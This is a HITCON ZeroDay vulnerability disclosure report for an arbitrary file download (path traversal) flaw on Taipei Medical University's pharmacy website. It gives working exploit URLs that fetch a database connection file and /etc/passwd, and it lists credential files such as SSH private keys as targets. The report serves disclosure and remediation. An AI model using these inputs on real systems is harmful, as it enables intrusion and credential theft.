臺北醫學大學藥學院任意檔案下載

Vulnerability Overview

ZDID: ZD-2023-00062
發信 Vendor: 臺北醫學大學
Title: 臺北醫學大學藥學院任意檔案下載
Introduction: 攻撃者可下載任意檔案

處理狀態

目前狀態

公開

Last Update : 2023/04/16

新提交
已審核
已通報
未回報修補狀況
未複測
公開

處理歷程

2023/02/14 22:28:41 : 新提交 (由失眠鋒ISSAC 更新此狀態)
2023/02/16 00:08:26 : 審核完成 (由 HITCON ZeroDay 服務團隊更新此狀態)
2023/03/01 17:41:05 : 修補中 (由 HITCON ZeroDay 服務團隊更新此狀態)
2023/03/01 17:41:05 : 審核完成 (由 HITCON ZeroDay 服務團隊更新此狀態)
2023/03/01 17:41:06 : 修補中 (由 HITCON ZeroDay 服務團隊更新此狀態)
2023/04/16 03:00:02 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

ZDID：ZD-2023-00062
通報者：ISSAC_f0ng (失眠鋒ISSAC)
風險：高
類型：任意檔案下載 (Arbitrary File Download)

參考資料

攻擊者可經由該漏洞取得後端系統中的任意資料(包含主機之敏感檔案)。

OWASP Top 10 - 2017 A5 - Broken Access Control
https://www.owasp.org/index.php/Top_10-2017_A5-Broken_Access_Control

OWASP Top 10 - 2013 A4 - Insecure Direct Object References
https://www.owasp.org/index.php/Top_10_2013-A4-Insecure_Direct_Object_References

CWE-284: Improper Access Control
https://cwe.mitre.org/data/definitions/284.html

OWASP - Path Traversal 及防禦方式
https://www.owasp.org/index.php/Path_Traversal

CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
https://cwe.mitre.org/data/definitions/22.html

(本欄位資訊由系統根據漏洞類別自動產生，做為漏洞參考資料。)

敘述

如下

MySQL連接檔案
http://pharm.tmu.edu.tw/download.php?filename=dbconnect&filepath=/libs/dbconnection.php

/etc/passwd 檔案
http://pharm.tmu.edu.tw/download.php?filename=hereisthetest&filepath=/../../../../../../../../etc/passwd

其他檔案如:

/root/.bash_history
/home/username/.bash_history
/root/.ssh/id_rsa 
/root/.ssh/authorized_keys
var/lib/mlocate/mlocate.db

等無法下載，可能是因為權限不足。

潛在風險: 代碼審計

聲名:本人無惡意，為政府, 學校, 企業等網站進行測試只為了找出漏洞然後通報，希望達到加強網站安全的目的，避免被其他有心人士的利用，並在過程中不斷學習。截圖後圖片和下載的檔案已經全部刪除, 如圖片有任何敏感數據請馬上通知。
謝謝。

修補建議

禁止下載php或者只限下載pdf, doc, docx等等

擷圖

留言討論

聯絡組織

發送私人訊息

您也可以透過私人訊息的方式與組織聯繫，討論有關於這個漏洞的相關資訊。

臺北醫學大學藥學院任意檔案下載 - HITCON ZeroDay

Vulnerability Detail Report